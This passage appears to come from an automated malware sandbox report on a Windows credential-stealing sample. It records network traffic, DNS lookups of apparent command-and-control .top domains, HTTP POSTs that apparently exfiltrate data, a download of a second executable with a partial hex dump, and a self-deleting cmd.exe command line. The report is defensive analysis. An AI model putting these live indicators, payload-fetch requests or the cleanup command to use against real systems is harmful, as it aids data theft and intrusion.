                                                                                            Apr 12, 2021 15:12:16.597224951 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.597326040 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.597361088 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.638508081 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.638537884 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.638550043 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.638565063 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.638623953 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.638681889 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.638701916 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.639853001 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639873028 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639884949 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639892101 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639899015 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639906883 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639918089 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639924049 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639931917 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639944077 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.639998913 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.640311956 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.679864883 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679888010 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679897070 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679910898 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679919958 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679933071 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679941893 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679949999 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.679959059 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681212902 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681263924 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681394100 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681415081 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681430101 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681513071 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681528091 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681535959 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681550980 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.681560993 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.707063913 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.707149029 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.707659960 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.748936892 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.333112955 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.374478102 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.378030062 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.378488064 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.378662109 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.419775963 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.419828892 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.419853926 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.419990063 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420016050 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420021057 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420046091 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420049906 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420057058 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420068979 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420070887 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420095921 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420104027 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420130968 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420152903 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420202971 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420228958 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.420308113 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.420334101 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.461483002 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461522102 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461539030 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461555004 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461580992 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461599112 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461623907 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461647987 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461672068 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461697102 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461733103 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461740971 CEST4971880192.168.2.58.209.64.179
                                                                                            Apr 12, 2021 15:12:17.461761951 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461786032 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461819887 CEST80497188.209.64.179192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.461849928 CEST80497188.209.64.179192.168.2.5

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 12, 2021 15:11:03.252877951 CEST5270453192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:03.302067995 CEST53527048.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:03.408680916 CEST5221253192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:03.466120958 CEST53522128.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:03.603041887 CEST5430253192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:03.655349970 CEST53543028.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:05.147036076 CEST5378453192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:05.208934069 CEST53537848.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:06.122662067 CEST6530753192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:06.171329975 CEST53653078.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:06.842330933 CEST6434453192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:06.902183056 CEST53643448.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:14.613799095 CEST6206053192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:14.663032055 CEST53620608.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:15.750401020 CEST6180553192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:15.803128958 CEST53618058.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:16.828474998 CEST5479553192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:16.877321959 CEST53547958.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:18.032571077 CEST4955753192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:18.089823961 CEST53495578.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:21.158091068 CEST6173353192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:21.218122005 CEST53617338.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:22.877881050 CEST6544753192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:22.929517984 CEST53654478.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:24.133338928 CEST5244153192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:24.184992075 CEST53524418.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:29.015472889 CEST6217653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:29.067347050 CEST53621768.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:30.175316095 CEST5959653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:30.225624084 CEST53595968.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:30.923969984 CEST6529653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:30.985375881 CEST53652968.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:36.018687963 CEST6318353192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:36.076206923 CEST53631838.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:39.333095074 CEST5973653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:39.339348078 CEST5105853192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:39.339772940 CEST5263653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:39.382023096 CEST53597368.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:39.388422012 CEST53526368.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:39.390912056 CEST53510588.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:11:59.265461922 CEST6015153192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:11:59.331958055 CEST53601518.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:09.218292952 CEST5696953192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:09.269835949 CEST53569698.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.208142996 CEST5516153192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:16.439253092 CEST53551618.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:17.179099083 CEST5475753192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:17.326972961 CEST53547578.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:18.367537022 CEST4999253192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:19.373641968 CEST4999253192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:19.599884987 CEST53499928.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:19.991362095 CEST53499928.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:22.812798977 CEST6007553192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:22.872903109 CEST53600758.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:40.032221079 CEST5501653192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:40.089642048 CEST53550168.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:54.322495937 CEST6434553192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:54.372682095 CEST53643458.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:12:57.854927063 CEST5712853192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:12:57.922904015 CEST53571288.8.8.8192.168.2.5
                                                                                            Apr 12, 2021 15:13:04.510792017 CEST5479153192.168.2.58.8.8.8
                                                                                            Apr 12, 2021 15:13:04.585005999 CEST53547918.8.8.8192.168.2.5

                                                                                            ICMP Packets

                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                            Apr 12, 2021 15:12:19.991468906 CEST192.168.2.58.8.8.8d001(Port unreachable)Destination Unreachable

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Apr 12, 2021 15:12:16.208142996 CEST192.168.2.58.8.8.80xa7f3Standard query (0)aufsvg12.topA (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:17.179099083 CEST192.168.2.58.8.8.80xe1a7Standard query (0)mardeq01.topA (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:18.367537022 CEST192.168.2.58.8.8.80x983Standard query (0)awumad01.topA (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:19.373641968 CEST192.168.2.58.8.8.80x983Standard query (0)awumad01.topA (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:40.032221079 CEST192.168.2.58.8.8.80x9034Standard query (0)EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZA (IP address)IN (0x0001)

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Apr 12, 2021 15:12:16.439253092 CEST8.8.8.8192.168.2.50xa7f3No error (0)aufsvg12.top8.211.1.15A (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:17.326972961 CEST8.8.8.8192.168.2.50xe1a7No error (0)mardeq01.top8.209.64.179A (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:19.599884987 CEST8.8.8.8192.168.2.50x983No error (0)awumad01.top8.209.66.205A (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:19.991362095 CEST8.8.8.8192.168.2.50x983No error (0)awumad01.top8.209.66.205A (IP address)IN (0x0001)
                                                                                            Apr 12, 2021 15:12:40.089642048 CEST8.8.8.8192.168.2.50x9034Name error (3)EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZnonenoneA (IP address)IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • aufsvg12.top
                                                                                            • mardeq01.top
                                                                                            • awumad01.top

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.5497178.211.1.1580C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 12, 2021 15:12:16.555598021 CEST1584OUTPOST /index.php HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTx
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                            Host: aufsvg12.top
                                                                                            Content-Length: 67238
                                                                                            Cache-Control: no-cache
                                                                                            Apr 12, 2021 15:12:16.707063913 CEST1653INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                            Date: Mon, 12 Apr 2021 13:12:16 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 2
                                                                                            Connection: close
                                                                                            X-Powered-By: Express
                                                                                            ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                            Data Raw: 4f 4b
                                                                                            Data Ascii: OK


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.5497188.209.64.17980C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 12, 2021 15:12:17.378488064 CEST1654OUTPOST /index.php HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadj
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                            Host: mardeq01.top
                                                                                            Content-Length: 67223
                                                                                            Cache-Control: no-cache
                                                                                            Apr 12, 2021 15:12:17.518408060 CEST1723INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.10.3 (Ubuntu)
                                                                                            Date: Mon, 12 Apr 2021 13:12:17 GMT
                                                                                            Content-Length: 3
                                                                                            Connection: close
                                                                                            X-Powered-By: Express
                                                                                            Data Raw: 6f 6b 21
                                                                                            Data Ascii: ok!


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.5497198.209.66.20580C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 12, 2021 15:12:19.644112110 CEST1724OUTGET /download.php?file=lv.exe HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                            Host: awumad01.top
                                                                                            Connection: Keep-Alive
                                                                                            Apr 12, 2021 15:12:19.718657970 CEST1724INHTTP/1.1 302 Found
                                                                                            Date: Mon, 12 Apr 2021 13:12:19 GMT
                                                                                            Server: Apache/2.2.22 (@RELEASE@)
                                                                                            X-Powered-By: PHP/5.3.3
                                                                                            Location: downfiles/lv.exe
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            3192.168.2.5497208.209.66.20580C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 12, 2021 15:12:19.769709110 CEST1725OUTGET /downfiles/lv.exe HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                            Host: awumad01.top
                                                                                            Connection: Keep-Alive
                                                                                            Apr 12, 2021 15:12:19.834563971 CEST1727INHTTP/1.1 200 OK
                                                                                            Date: Mon, 12 Apr 2021 13:12:19 GMT
                                                                                            Server: Apache/2.2.22 (@RELEASE@)
                                                                                            Last-Modified: Mon, 12 Apr 2021 02:46:58 GMT
                                                                                            ETag: "320648-132ebb-5bfbd8703eb96"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 1257147
                                                                                            Connection: close
                                                                                            Content-Type: application/octet-stream
                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 e8 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e8 c9 00 00 00 00 16 00 00 ca 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 d0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d b4 ea 47 00 89 48 04
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtzB8@@@`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc@BU\}t+}FEuHGH


                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Start time:15:11:10
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
                                                                                            Imagebase:0x400000
                                                                                            File size:749568 bytes
                                                                                            MD5 hash:5E3189812E802C0FD68CE592CB1E1999
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:21
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Local\Temp\Murano.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Users\user\AppData\Local\Temp\Murano.exe'
                                                                                            Imagebase:0x400000
                                                                                            File size:1257147 bytes
                                                                                            MD5 hash:AFF6F8C7521796D3BC8FC1059DBE2409
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 31%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:22
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
                                                                                            Imagebase:0x270000
                                                                                            File size:232960 bytes
                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:15:12:22
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:15:12:22
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Local\Temp\New Feature\4.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\New Feature\4.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:328704 bytes
                                                                                            MD5 hash:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 38%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:22
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:timeout 3
                                                                                            Imagebase:0x13c0000
                                                                                            File size:26112 bytes
                                                                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

